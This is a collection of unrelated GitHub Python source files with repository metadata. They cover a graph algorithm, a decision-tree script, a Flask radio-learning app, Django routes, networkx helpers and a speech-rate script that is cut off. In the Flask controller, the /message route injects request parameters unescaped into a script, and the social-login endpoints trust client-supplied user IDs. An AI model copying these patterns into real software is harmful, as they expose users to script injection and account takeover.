3306e7504c4890b31bcf7842dfe2f7bfc38ef8ca
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2085/60587/313739.py
|
e7738c8f2800230aedac863942c2147cfac12720
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
class Edge:
def __init__(self, u, v, w):
self.u = u
self.v = v
self.w = w
def __str__(self):
return str(self.u) + str(self.v) + str(self.w)
def f(edges, n, m, root):
res = 0
while True:
pre = [-1] * n
visited = [-1] * n
inderee = [INF] * n
inderee[root] = 0
for i in range(m):
if edges[i].u != edges[i].v and edges[i].w < inderee[edges[i].v]:
pre[edges[i].v] = edges[i].u
inderee[edges[i].v] = edges[i].w
for i in range(n):
if i != root and inderee[i] == INF:
return -1
tn = 0
circle = [-1] * n
for i in range(n):
res += inderee[i]
v = i
while visited[v] != i and circle[v] == -1 and v != root:
visited[v] = i
v = pre[v]
if v != root and circle[v] == -1:
while circle[v] != tn:
circle[v] = tn
v = pre[v]
tn += 1
if tn == 0:
break
for i in range(n):
if circle[i] == -1:
circle[i] = tn
tn += 1
for i in range(m):
v = edges[i].v
edges[i].u = circle[edges[i].u]
edges[i].v = circle[edges[i].v]
if edges[i].u != edges[i].v:
edges[i].w -= inderee[v]
n = tn
root = circle[root]
return res
INF = 9999999999
if __name__ == '__main__':
n, m, root = list(map(int, input().split()))
edges = []
for i in range(m):
u, v, w = list(map(int, input().split()))
edges.append(Edge(u - 1, v - 1, w))
print(f(edges, n, m, root - 1), end="")
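
# --- Editor's note: hedged usage sketch, not part of the original file. ---
# f() implements Chu-Liu/Edmonds for a minimum-weight arborescence; a direct
# call uses 0-indexed nodes, as converted in __main__ above:
#   edges = [Edge(0, 1, 2), Edge(0, 2, 5), Edge(1, 2, 1)]
#   f(edges, 3, 3, 0)  # -> 3 (0->1 costs 2, 1->2 costs 1); -1 if unreachable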
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
564aecf5ebe2b8468bd519fe9c9b4ded11d2c950
|
ca609a94fd8ab33cc6606b7b93f3b3ef201813fb
|
/2017-feb/16.regression algorithms/decision-trees2.py
|
a3a5fc45765aca71350c73642948a7e5c308cc9a
|
[] |
no_license
|
rajesh2win/datascience
|
fbc87def2a031f83ffceb4b8d7bbc31e8b2397b2
|
27aca9a6c6dcae3800fabdca4e3d76bd47d933e6
|
refs/heads/master
| 2021-01-20T21:06:12.488996
| 2017-08-01T04:39:07
| 2017-08-01T04:39:07
| 101,746,310
| 1
| 0
| null | 2017-08-29T09:53:49
| 2017-08-29T09:53:49
| null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
import os
import pandas as pd
import pydot
from sklearn import tree
from sklearn import metrics
from sklearn import model_selection
import io
import math
#returns current working directory
os.getcwd()
#changes working directory
os.chdir("D:\\revenue-prediction")
restaurant_train = pd.read_csv("train.csv")
restaurant_train.shape
restaurant_train.info()
restaurant_train1 = pd.get_dummies(restaurant_train, columns=['City Group', 'Type'])
restaurant_train1.shape
restaurant_train1.info()
restaurant_train1.drop(['Id','Open Date','City','revenue'], axis=1, inplace=True)
X_train = restaurant_train1
y_train = restaurant_train['revenue']
dt_estimator = tree.DecisionTreeRegressor()
dt_grid = {'max_depth': [3, 4, 5]}
# Superseded by the RMSE-scorer estimator below; note that this scoring string
# is spelled 'neg_mean_squared_error' on modern scikit-learn.
dt_grid_estimator = model_selection.GridSearchCV(dt_estimator, dt_grid, scoring='mean_squared_error', cv=10, n_jobs=5)
def rmse(y_true, y_pred):
return math.sqrt(metrics.mean_squared_error(y_true, y_pred))
dt_grid_estimator = model_selection.GridSearchCV(dt_estimator, dt_grid, scoring=metrics.make_scorer(rmse), cv=10, n_jobs=5)
#build model using entire train data
dt_grid_estimator.fit(X_train,y_train)
dt_grid_estimator.grid_scores_  # cv_results_ on scikit-learn >= 0.20
dt_grid_estimator.best_estimator_
dot_data = io.StringIO()
tree.export_graphviz(dt_grid_estimator.best_estimator_, out_file = dot_data, feature_names = X_train.columns)
graph = pydot.graph_from_dot_data(dot_data.getvalue())[0]
graph.write_pdf("dt1.pdf")
|
[
"info@algorithmica.co.in"
] |
info@algorithmica.co.in
|
774b5d122b0934195ecea5ea6da154d54920ab87
|
73d61eec8ff9a7408ef1c040f5a6ee229753da6e
|
/Flask/NationalEducationRadio/NationalEducationRadio/controllers/radio.py
|
5bf37430b5688fcceac3aecddaf4186b697233b3
|
[
"MIT"
] |
permissive
|
Jessieluu/WIRL_national_education_radio
|
dfff69fb266252103171af34e24fc6a1ac558045
|
edb8b63c25bc7bd5a9a7d074173f02913971f8a7
|
refs/heads/master
| 2020-03-10T17:12:03.485819
| 2018-07-13T08:44:15
| 2018-07-13T08:44:15
| 129,494,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,705
|
py
|
# -*- coding: utf-8 -*-
import time
import sys
import math
import random
import json
from io import StringIO
from datetime import datetime, timedelta
from flask import Flask, redirect, url_for, render_template, session, flash, request, jsonify, Response
# (flask.ext.* was removed in Flask 1.0; the flask_login import below provides these names.)
from sqlalchemy import desc
from sqlalchemy import exists
import ast
from NationalEducationRadio.service import get_blueprint
from NationalEducationRadio.service import db
from NationalEducationRadio.models.db.User import User, AccessLevel
from NationalEducationRadio.models.form.LoginForm import LoginForm
from NationalEducationRadio.models.form.RegisterForm import RegisterForm
from NationalEducationRadio.models.units.tools import password_encryption, required_to_flash, audio_upload, \
parse_question_csv, get_solr_data
from NationalEducationRadio.models.db.Channel import Channel
from NationalEducationRadio.models.db.Audio import Audio
from NationalEducationRadio.models.db.Record import Record
from NationalEducationRadio.models.db.HotPlay import HotPlay
from NationalEducationRadio.models.db.OperationLog import OperationLog
from NationalEducationRadio.models.db.PlayLog import PlayLog
from NationalEducationRadio.models.db.TimeHotPlay import TimeHotPlay
from NationalEducationRadio.models.db.SearchLog import SearchLog
from NationalEducationRadio.models.db.SearchSelectedLog import SearchSelectedLog
from NationalEducationRadio.models.db.KeywordsTable import KeywordsTable
from NationalEducationRadio.models.recommend.batch import count_user_time_hot_play, similar_audio, hot_play, op_habit, timehotplay, keywordprocessing
from NationalEducationRadio.controllers.recommend import recommend_audios
from collections import OrderedDict
import jieba
import jieba.analyse
import requests
import numpy as np
import os
from hanziconv import HanziConv
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from collections import Set
from flask_login import UserMixin, LoginManager, login_required, current_user, login_user, logout_user
root = get_blueprint('root')
radio = get_blueprint('radio')
@root.route('/', methods=['GET', ])
def root_index():
return redirect(url_for('radio.index'))
# @radio.route('/test', methods=['GET', ])
# def knowledge_index():
# print("test")
# return render_template('radio/knowledge.html')
@radio.route('/', methods=['GET', ])
@login_required
def index():
"""
首頁抓第一筆資訊並跳轉到那頁
:return: 第一筆節目音檔的頁面
"""
ado = Audio.query.first()
return redirect(url_for('radio.show', channel_id=ado.audio_channel, audio_id=ado.audio_id))
@radio.app_errorhandler(404)
def handle_404(err):
return request.path
@radio.route('/json/<int:channel_id>/<int:audio_id>', methods=['GET', ])
@login_required
def showJson(channel_id, audio_id):
"""
將該音檔所帶有的資訊與題目轉換成 JSON,讓 React 使用
:return: JSON 格式資訊
"""
    channel = Channel.query.filter_by(channel_id=channel_id).first()
    audios = Audio.query.filter_by(channel=channel).all()
    audio = Audio.query.filter_by(audio_id=audio_id).first()
    if audio is None or channel is None or audio.channel != channel:
        return "Nothing"
    # get_solr_data returns (success, keywords, summary), as used in show()
    # below; only the summary is needed here, fetched after the None check so
    # a missing audio can't raise an AttributeError.
    success, keywords, summary = get_solr_data(audio.audio_id)
"""
計算前後,有更好的方法嗎?
"""
aI = 0
now = None
pre = None
nxt = None
for x in audios:
if aI > 0 and now is None:
pre = audios[aI - 1].audio_id
if now is not None:
nxt = audios[aI].audio_id
break
if x == audio:
now = aI
aI += 1
a = [1, 2, 3, 4, 5, 6]
json_content = {}
json_content['channel_id'] = channel_id
json_content['channel_name'] = channel.channel_name
json_content['audio_id'] = audio_id
json_content['audio_name'] = audio.audio_name
json_content['audio'] = url_for('static', filename="upload/" + audio.audio_file)
json_content['title'] = audio.audio_name
json_content['depiction'] = audio.channel.channel_memo
json_content['logo'] = url_for('static', filename="images/covers/" + str(random.choice(a)) + ".jpg")
json_content['forward'] = url_for('radio.show', channel_id=channel_id, audio_id=nxt) if nxt is not None else "#"
json_content['backward'] = url_for('radio.show', channel_id=channel_id, audio_id=pre) if pre is not None else "#"
json_content['questions'] = json.loads(audio.audio_question)
json_content['audio_summary'] = summary
keyword = []
if audio.keyword is not None:
keyword = audio.keyword.split(",")
json_content['keywords'] = keyword
return json.dumps(json_content, ensure_ascii=False)
@radio.route('/login', methods=['GET', 'POST'])
def login():
def login_redirect():
return redirect(url_for('radio.index'))
if current_user.is_anonymous is not True:
return login_redirect()
form = LoginForm()
form2 = RegisterForm()
if form.validate_on_submit():
# new_user = User(name=form2.name.data,
# account=form2.account.data,
# password=password_encryption(form2.password.data),
# level=0)
# db.session.add(new_user)
# db.session.commit()
admin_user = User.query.filter_by(account=form.account.data,
password=password_encryption(form.password.data)).first()
print(admin_user)
if admin_user is not None:
session['level'] = admin_user.level
login_user(admin_user)
return login_redirect()
else:
            flash('Incorrect account or password')
required_to_flash(form)
return render_template('radio/login.html', current_user=current_user, form=form, reg=form2)
@radio.route('/error')
def accountExist():
return "exist"
@radio.route('/message')
def message():
return '''
<script>
alert("{message}");
window.location="{location}";
</script>'''.format(
message=str(request.args['message']),
location=request.args['location']
)
@radio.route('/register', methods=['POST'])
def register():
form = RegisterForm()
if form.validate_on_submit():
(exist,), = db.session.query(exists().where(User.account == form.account.data)) # check account existance
if (exist):
            return redirect(url_for('radio.message', message='Account already exists', location='login'))
new_user = User(name=form.name.data,
account=form.account.data,
password=password_encryption(form.password.data),
level=0)
db.session.add(new_user)
db.session.commit()
        return redirect(url_for('radio.message', message='Registration successful, please log in again', location='login'))
# return render_template('radio/register.html', current_user=current_user, form=form)
@radio.route('/logout', methods=['GET', 'POST'])
def logout():
logout_user()
return redirect(url_for('radio.login'))
@radio.route('/dosomething', methods=['POST', ])
@login_required
def dosomething():
    audio = Audio.query.filter_by(audio_id=request.json['audio_id']).first()
    user = User.query.filter_by(id=current_user.id).first()
    record = Record(audio=audio, user=user, record_data=json.dumps(request.json['questions']))
    # The record was constructed but never persisted; add and commit so the
    # submitted answers are actually saved.
    db.session.add(record)
    db.session.commit()
    return "success"
@radio.route('/record', methods=['GET', 'POST'])
def record():
# audios = Audio.query.filter_by(channel=channel).all()
records = Record.query.filter_by(user_id=current_user.id).order_by(desc(Record.record_id)).all()
return render_template('radio/record.html', current_user=current_user, records=records)
@radio.route('/view/<record_id>', methods=['GET', 'POST'])
def view(record_id):
record = Record.query.filter_by(user_id=current_user.id, record_id=record_id).first()
audio = record.audio
questions = json.load(StringIO(audio.audio_question))
for question in questions:
question['user_answer'] = 0
question['answer'] = 0
recordData = json.load(StringIO(record.record_data))
for data in recordData:
for question in questions:
if data['id'] == question['id']:
question['user_answer'] = data['user_answer']
question['answer'] = data['answer'][0]
break
return render_template('radio/view.html', questions=questions)
@radio.route('/<int:channel_id>/<int:audio_id>/', methods=['GET', ])
@login_required
def show(channel_id, audio_id):
nextChannel = Channel.query.join(Audio, Audio.audio_channel == Channel.channel_id).filter(
Channel.channel_id > channel_id).first()
if nextChannel is not None:
nextAudio = Audio.query.filter_by(audio_channel=nextChannel.channel_id).first()
else:
nextAudio = None
audio = Audio.query.filter_by(audio_id=audio_id).first()
audios = Audio.query.filter_by(audio_channel=channel_id).order_by(Audio.audio_id).all()
success, keywords, summary = get_solr_data(audio.audio_id)
if success is False:
summary = audio.channel.channel_memo
else:
keywords = keywords.split(" , ")
recommend_audio = recommend_audios(current_user.id, audio_id)
print(recommend_audio)
return render_template('radio/front_index.html', targetAudio=audio, audios=audios, recommend_audio = recommend_audio, nextChannel=nextChannel,
nextAudio=nextAudio,
success=success, summary=summary, keywords=keywords, page="show",
json_file=url_for('radio.showJson', channel_id=channel_id, audio_id=audio_id))
@radio.route('/newIndex', methods=['GET', ])
@login_required
def newIndex():
"""
首頁抓第一筆資訊並跳轉到那頁
:return: 第一筆節目音檔的頁面
"""
ado = Audio.query.group_by(Audio.audio_channel).first()
return redirect(url_for('radio.show', channel_id=ado.audio_channel, audio_id=ado.audio_id))
@radio.route('/front_record', methods=['GET', ])
def front_record():
records = Record.query.filter_by(user_id=current_user.id).order_by(desc(Record.record_id)).all()
ids = list()
for record in records:
ids.append(record.audio.audio_channel)
channels = Channel.query.filter(Channel.channel_id.in_(set(ids))).all()
session1 = []
session2 = []
for channel in channels:
session1.append({
'channel_id': channel.channel_id,
'name': channel.channel_name,
'count': ids.count(channel.channel_id)
})
for record in records:
audio = record.audio
if audio.audio_channel == channel.channel_id:
questions = json.load(StringIO(audio.audio_question))
for question in questions:
question['user_answer'] = 0
question['answer'] = 0
recordData = json.load(StringIO(record.record_data))
for data in recordData:
for question in questions:
if data['id'] == question['id']:
question['user_answer'] = data['user_answer']
question['answer'] = data['answer'][0]
break
session2.append((record, questions))
return render_template('radio/front_record.html', session1=session1, session2=session2, page="record")
# ***
@radio.route('/get_playlog', methods=['POST',])
@login_required
def get_playlog():
ts = int(time.time())
Pl = PlayLog(
audio = request.json['audio_id'],
user = current_user.id,
star_time = ts)
db.session.add(Pl)
db.session.commit()
playlog_id = PlayLog.query.filter_by(user = current_user.id).order_by(desc(PlayLog.play_log_id)).first()
json_content = {}
json_content['playlog_id'] = playlog_id.play_log_id
return json.dumps(json_content, ensure_ascii=False)
# ***
@radio.route('/add_playlog_end_time', methods=['POST',])
@login_required
def add_playlog_end_time():
ts = int(time.time())
#print(ts)
#print(request.json['playLogId'])
playlog = PlayLog.query.filter_by(play_log_id = request.json['playLogId']).first()
playlog.end_time = ts
db.session.commit()
return "success"
# ***
@radio.route('/add_oplog', methods=['POST',])
@login_required
def add_oplog():
ts = int(time.time())
Op = OperationLog(
play_log = request.json['play_log'],
operation_code = request.json['operation_code'],
operation_value = request.json['operation_value'],
timestamp = ts)
db.session.add(Op)
db.session.commit()
return "success"
@radio.route('/get_new_audio_id', methods=['POST',])
@login_required
def get_new_audio_id():
ret = ""
audio = Audio.query.with_entities(Audio.audio_id).all()
if request.json['button_type'] == "forward" :
for i in range(len(audio)):
if audio[i][0] == request.json['audio_id'] and i+1 <= len(audio):
ret = str(audio[i+1][0])
elif request.json['button_type'] == "backward" :
for i in (range(len(audio)), -1, -1):
if audio[i][0] == request.json['audio_id'] and i-1 >= 0:
ret = str(audio[i-1][0])
else:
pass
json_content = {}
json_content['audio_id'] = request.json['audio_id']
###############
return json.dumps(json_content, ensure_ascii=False)
@radio.route('/daily_batch/', methods=['GET', ])
def daily_batch():
    # Routine daily batch computation
print("****** Start processing Daily_batch ! ******\n", file=sys.stderr)
    # System-wide jobs
keywordprocessing()
similar_audio()
hot_play()
timehotplay()
    # Per-user jobs
users = User.query.all()
print("****** Start processing count_user_time_hot_play Module ! ******\n", file=sys.stderr)
for user in users:
count_user_time_hot_play(user.id)
print("****** Processing count_user_time_hot_play Module done ! ******\n", file=sys.stderr)
# print("****** Start processing op_habit ! ******\n", file=sys.stderr)
for user in users:
op_habit(user.id)
# print("****** Processing op_habit done! ******\n", file=sys.stderr)
print("****** Processing Daily_batch done! ******\n", file=sys.stderr)
return "Processing Daily_batch done!"
@radio.route('/API_FB_login', methods=['POST'])
def API_FB_login():
userID = request.json['userID']
accessToken = request.json['accessToken']
userName = request.json['userName']
userEmail = request.json['userEmail']
print(userID, accessToken, userName, userEmail)
FBuserID_Exist = User.query.filter_by(FBuserID=userID).first()
    if FBuserID_Exist is None:
newAccount = User(name=userName,
account=userEmail,
password=None,
level=123,
FBuserID=userID,
FBAccessToken=accessToken)
db.session.add(newAccount)
login_user(newAccount)
else:
FBuserID_Exist.FBAccessToken = accessToken
db.session.add(FBuserID_Exist)
login_user(FBuserID_Exist)
db.session.commit()
return '11'
@radio.route('/API_GOOGLE_login', methods=['POST'])
def API_GOOGLE_login():
userID = request.json['userID']
userName = request.json['userName']
userEmail = request.json['userEmail']
print(userID, userName, userEmail)
GOOGLEuserID_Exist = User.query.filter_by(GOOGLEuserID=userID).first()
    if GOOGLEuserID_Exist is None:
newAccount = User(name=userName,
account=userEmail,
password=None,
level=123,
GOOGLEuserID=userID)
db.session.add(newAccount)
login_user(newAccount)
else:
db.session.add(GOOGLEuserID_Exist)
login_user(GOOGLEuserID_Exist)
db.session.commit()
return '11'
# need to change keyword search
@radio.route('/knowledge', methods=['GET', ])
def knowledge():
finalResult = []
# get search keyword
keyword = str(request.args.get('search'))
#keyword = "廣播"
# scrawler setting
# url = "http://140.124.183.5:8983/solr/EBCStation/select?indent=on&q=*:*&rows=999&wt=json"
# url = "http://nermoocs.org/solr/EBCStation/select?indent=on&q=*:*&rows=999&wt=json"
url = "http://127.0.0.1/solr/EBCStation/select?indent=on&q=*:*&rows=999&wt=json"
article = requests.get(url).json()
# db length
articleLen = article['response']['numFound']
# save audio_id
audioID = set()
# filter Audio ID
for a in range(articleLen):
        if len(audioID) == 100:
break
if keyword in article['response']['docs'][a]['content']:
audioID.add(article['response']['docs'][a]['audio_id'])
print(audioID)
# query Audio Info from db
for i in audioID:
# save one audio format result
result = {}
audioInfo = Audio.query.filter_by(audio_id=i).first()
if audioInfo is None:
continue
result["id"] = i
# processing keyword string format
keywordList = []
if audioInfo.keyword is not None:
for k in HanziConv.toTraditional(audioInfo.keyword).split(","):
                if k != '':
keywordList.append(k)
# save json format parameters
result["keyWord"] = keywordList
result["type"] = audioInfo.audio_channel
result["title"] = audioInfo.audio_name
result["text"] = ""
# get similar audio ID
similarAudioData = Audio.query.filter_by(audio_id=i).first().similar_audio
# save ID
similarAudioID = []
# str covert to dict
if similarAudioData is not None:
listSimilarAudio = ast.literal_eval(similarAudioData)
# save audio all similarAudioID
for l in listSimilarAudio:
for k in l.keys():
similarAudioID.append(int(k))
result["links"] = similarAudioID
finalResult.append(result)
print(finalResult)
resp = Response(response=json.dumps(finalResult, ensure_ascii=False),
status=200,
mimetype="application/json")
return resp
# caption get
@radio.route('/captionGet', methods=['POST', ])
def captionGet():
# scrawler setting
url = "http://127.0.0.1/solr/EBCStationCaption/select?indent=on&q=*:*&rows=9999&wt=json"
# url = "http://nermoocs.org/solr/EBCStationCaption/select?indent=on&q=*:*&rows=9999&wt=json"
caption = requests.get(url).json()
# db length
captionLen = caption['response']['numFound']
audio_id = request.json['audio_id']
print(audio_id)
for l in range(captionLen):
captionList = []
if caption['response']['docs'][l]['audio_id'] == audio_id:
for i in caption['response']['docs'][l]['caption'].split("\n"):
content = i.split(",")
if len(content) < 2:
continue
captionList.append({
'start_time': content[0],
'end_time': content[1],
'caption': content[2]
})
break
print(captionList)
return json.dumps(captionList, ensure_ascii=False)
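
# --- Editor's note, not part of the original file. ---
# captionGet answers POSTs of {"audio_id": ...} with a JSON list shaped like
# [{"start_time": "0.0", "end_time": "2.4", "caption": "..."}, ...], parsed
# from the comma-separated caption rows stored in the Solr core above.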
|
[
"lujessie950410@gmail.com"
] |
lujessie950410@gmail.com
|
4bf8468109c4dc890a374ce4940ebd3f6e8b9575
|
5e07d7e4d2ee7b470f05c4dfca30b105519e7dfb
|
/api_app/urls.py
|
646821ff26d126477669f1e96ac3c71db4fbe4bc
|
[] |
no_license
|
waltermaina/dht11_esp8266_django
|
921f229ebc76510bbc4c403852d182731841b885
|
888d8d9c82255ee8e6eaecce418f5c9fe4d996fc
|
refs/heads/master
| 2022-08-29T22:14:06.885360
| 2021-05-01T13:56:16
| 2021-05-01T13:56:16
| 235,754,246
| 0
| 0
| null | 2022-08-11T14:57:36
| 2020-01-23T08:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 400
|
py
|
# api_app/urls.py
from django.urls import include, path
from . import views
urlpatterns = [
path('v1/', views.ListData.as_view()),
path('v1/<str:pk>/', views.DataDetail.as_view()),
path('v2/', views.NewListData.as_view()),
path('v2/last/', views.LastRecordData.as_view()),
path('v2/<str:pk>/', views.NewDataDetail.as_view()),
path('rest-auth/', include('rest_auth.urls')),
]
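
# --- Editor's note, not part of the original file. ---
# Route summary (paths as defined above):
#   GET /v1/        -> ListData           GET /v1/<pk>/  -> DataDetail
#   GET /v2/        -> NewListData        GET /v2/last/  -> LastRecordData
#   GET /v2/<pk>/   -> NewDataDetail      rest-auth/     -> django-rest-auth endpoints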
|
[
"waltermaina@yahoo.com"
] |
waltermaina@yahoo.com
|
4c821cab3daa611fa7e3c9f00eb41fbaa0d93c51
|
5b507113111016534efb347104ef5aa98e594471
|
/constants.py
|
694decc4e9b29b7ac5341a4fa714b89b0717be63
|
[] |
no_license
|
Enlight-UW/enlight-backend
|
36ec941c45fde611b18b52f87054de964622db5e
|
a5b74f61d44a1492df87d7c19cf48ef4a017350b
|
refs/heads/master
| 2021-05-30T04:41:11.369788
| 2015-04-28T01:14:21
| 2015-04-28T01:14:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 65
|
py
|
VERSION = "0.0.1"
DB_FILENAME = "maquina.sqlite"
NUM_VALVES = 24
|
[
"alex@dividebyxero.com"
] |
alex@dividebyxero.com
|
ec33460c3849409bf61d09e4e2d82342a10baa68
|
d5292505eb7b8b93eca743eb187a04ea58d6b6a3
|
/venv/Lib/site-packages/networkx/utils/random_sequence.py
|
b8e3531f92047ece6fc5dc565eaeafde9f0c3d6b
|
[
"Unlicense"
] |
permissive
|
waleko/facerecognition
|
9b017b14e0a943cd09844247d67e92f7b6d658fa
|
ea13b121d0b86646571f3a875c614d6bb4038f6a
|
refs/heads/exp
| 2021-06-03T10:57:55.577962
| 2018-09-04T19:45:18
| 2018-09-04T19:45:18
| 131,740,335
| 5
| 1
|
Unlicense
| 2020-01-19T10:45:25
| 2018-05-01T17:10:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,196
|
py
|
# Copyright (C) 2004-2018 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
#
# Authors: Aric Hagberg (hagberg@lanl.gov)
# Dan Schult (dschult@colgate.edu)
# Ben Edwards (bedwards@cs.unm.edu)
"""
Utilities for generating random numbers, random sequences, and
random selections.
"""
import random
import sys
import networkx as nx
# Helpers for choosing random sequences from distributions.
# These use Python's random module:
# https://docs.python.org/2/library/random.html
def powerlaw_sequence(n, exponent=2.0):
"""
Return sample sequence of length n from a power law distribution.
"""
return [random.paretovariate(exponent - 1) for i in range(n)]
def zipf_rv(alpha, xmin=1, seed=None):
r"""Return a random value chosen from the Zipf distribution.
The return value is an integer drawn from the probability distribution
.. math::
p(x)=\frac{x^{-\alpha}}{\zeta(\alpha, x_{\min})},
where $\zeta(\alpha, x_{\min})$ is the Hurwitz zeta function.
Parameters
----------
alpha : float
Exponent value of the distribution
xmin : int
Minimum value
seed : int
Seed value for random number generator
Returns
-------
x : int
Random value from Zipf distribution
Raises
------
ValueError:
If xmin < 1 or
If alpha <= 1
Notes
-----
    The rejection algorithm generates random values for the power-law
distribution in uniformly bounded expected time dependent on
parameters. See [1]_ for details on its operation.
Examples
--------
>>> nx.zipf_rv(alpha=2, xmin=3, seed=42) # doctest: +SKIP
References
----------
.. [1] Luc Devroye, Non-Uniform Random Variate Generation,
Springer-Verlag, New York, 1986.
"""
if xmin < 1:
raise ValueError("xmin < 1")
if alpha <= 1:
raise ValueError("a <= 1.0")
if seed is not None:
random.seed(seed)
a1 = alpha - 1.0
b = 2**a1
while True:
u = 1.0 - random.random() # u in (0,1]
v = random.random() # v in [0,1)
x = int(xmin * u**-(1.0 / a1))
t = (1.0 + (1.0 / x))**a1
if v * x * (t - 1.0) / (b - 1.0) <= t / b:
break
return x
def cumulative_distribution(distribution):
"""Return normalized cumulative distribution from discrete distribution."""
cdf = [0.0]
psum = float(sum(distribution))
for i in range(0, len(distribution)):
cdf.append(cdf[i] + distribution[i] / psum)
return cdf
def discrete_sequence(n, distribution=None, cdistribution=None):
"""
Return sample sequence of length n from a given discrete distribution
or discrete cumulative distribution.
One of the following must be specified.
distribution = histogram of values, will be normalized
cdistribution = normalized discrete cumulative distribution
"""
import bisect
if cdistribution is not None:
cdf = cdistribution
elif distribution is not None:
cdf = cumulative_distribution(distribution)
else:
raise nx.NetworkXError(
"discrete_sequence: distribution or cdistribution missing")
# get a uniform random number
inputseq = [random.random() for i in range(n)]
# choose from CDF
seq = [bisect.bisect_left(cdf, s) - 1 for s in inputseq]
return seq
def random_weighted_sample(mapping, k):
"""Return k items without replacement from a weighted sample.
The input is a dictionary of items with weights as values.
"""
if k > len(mapping):
raise ValueError("sample larger than population")
sample = set()
while len(sample) < k:
sample.add(weighted_choice(mapping))
return list(sample)
def weighted_choice(mapping):
"""Return a single element from a weighted sample.
The input is a dictionary of items with weights as values.
"""
# use roulette method
rnd = random.random() * sum(mapping.values())
for k, w in mapping.items():
rnd -= w
if rnd < 0:
return k
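
# --- Editor's note: hedged usage sketch, not part of the original file. ---
#   random.seed(1)
#   discrete_sequence(5, distribution=[1, 3, 1])         # indices 0..2, weighted 1:3:1
#   random_weighted_sample({'a': 5, 'b': 1, 'c': 1}, 2)  # e.g. ['a', 'c']
#   zipf_rv(alpha=2, xmin=3)                             # int >= 3, heavy-tailed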
|
[
"a.kovrigin0@gmail.com"
] |
a.kovrigin0@gmail.com
|
2c1c34c5bcbf233aab6409d4ed753dce47d172ce
|
4383c8eccb56707d843bc048768a5265bb04f072
|
/py_files_old/pd_LSR.py
|
9b6e990dba92ad7a2ddf2c3cec956cd0e52f673b
|
[] |
no_license
|
alexalias/alexarbeit
|
395f2aac5c3cd718b4ad16dd8004acc84e7ed54f
|
2ba0b3771e00d1b9e4466ee7db853a009264e061
|
refs/heads/master
| 2020-12-31T05:24:36.445994
| 2017-05-22T20:27:38
| 2017-05-22T20:27:38
| 81,091,971
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,547
|
py
|
import os
import glob
import re
import numpy as np
from collections import defaultdict
import speech_rate
# Returns a dictionary keyed by phoneme, whose values alternate occurrence durations and local speech rates (LSR) from the training data.
# Looks like {a: [1452, 0.8, 799, 0.5], b : [655, 0.5, 799, 0.45]...}
def read_trainig_files():
training_dict = defaultdict(list)
os.chdir("C:/Users/alexutza_a/Abschlussarbeit/DB_Verbmobil/Evaluation/Training")
#Iterate over the training files
for file in glob.glob("*.par"):
work_file = open(file)
for line in work_file:
if re.match("MAU", line):
training_dict[line.split()[4]].append(int(line.split()[2]))
word_duration, phon_count, syl_count = speech_rate.word_duration(file, int(line.split()[3]))
training_dict[line.split()[4]].append((word_duration/0.0000625)/phon_count)
#training_dict[line.split()[4]].append(speech_rate.local_speech_rate(file, int(line.split()[3])))
work_file.close()
# Remove breaks from the data
x = training_dict.pop("<p:>")
return training_dict
# A dictionary giving the values of Mean and SD in a list for each encountered phoneme.
def phone_stats(training_dict):
stat_dict = defaultdict(list)
for phoneme in training_dict.keys():
stat_dict[phoneme].append(int(round(np.mean(training_dict[phoneme][::2]), 0)))
stat_dict[phoneme].append(int(round(np.std(training_dict[phoneme][::2]), 0)))
return stat_dict
# Not used
def mean_of_means(stat_dict):
m1 = 0
for p in stat_dict:
m1 += stat_dict[p][0]
mom = m1 / len(stat_dict.keys())
return mom
# Returns a flat list of phonemes occurring in the test files, each followed by its duration and local speech rate
# Looks like: ["a", 583, 0.5, "b", 12, 0.78, "a", 489, 0.12, ...]
def read_testfiles():
compare_list = []
os.chdir("C:/Users/alexutza_a/Abschlussarbeit/DB_Verbmobil/Evaluation/Test")
#Iterate over the test files
for file in glob.glob("*.par"):
work_file = open(file)
for line in work_file:
if re.match("MAU", line):
compare_list.append(str(line.split()[4]))
compare_list.append(int(line.split()[2]))
word_duration, phon_count, syl_count = speech_rate.word_duration(file, int(line.split()[3]))
compare_list.append(round((word_duration/0.0000625)/phon_count, 1)) # speech rate as word_duration / # phonemes
#compare_list.append(speech_rate.local_speech_rate(file, int(line.split()[3])))
work_file.close()
#print(compare_list)
# Remove breaks from the data
# Get list of indexes for occurences of <p:>
pause_index = [i for i, val in enumerate(compare_list) if val == "<p:>"]
#print(len(pause_index))
pause_dur = [i + 1 for i in pause_index]
pause_stat = [j + 1 for j in pause_dur]
p_l = [x for y in zip (pause_index, pause_dur) for x in y]
p_list = p_l + pause_stat
#print(len(p_list))
actual_list = []
#print(compare_list)
ind = 0
# Copy list to new list, without pauses
for el in compare_list:
if ind not in p_list:
actual_list.append(el)
ind += 1
return actual_list
# Returns a dictionary of the official phoneme means for VM1+2
def official_stats():
o_dict = defaultdict(list)
#omedian_dict = defaultdict(float)
official_file = open("C:/Users/alexutza_a/Abschlussarbeit/DB_Verbmobil/Evaluation/Training/Basic_german_phone_list.txt")
for line in official_file:
if len(line.split()[0]) < 3:
o_dict[line.split()[0]].append(int(round((float(line.split()[6])/0.0000625), 0)))
o_dict[line.split()[0]].append(int(round((float(line.split()[7])/0.0000625), 0)))
#omedian_dict[line.split()[0]] = int(round((float(line.split()[9])/0.0000625), 0))
#print(o_dict)
return o_dict#, omedian_dict
# Proportion of cases in which the local speech rate (word duration / no. of phonemes) does not exceed the phoneme's mean duration
def test_mean(training_dict, stat_dict):
test_dict = defaultdict(float)
for elem in training_dict.keys():
rate_list = training_dict[elem][1::2]
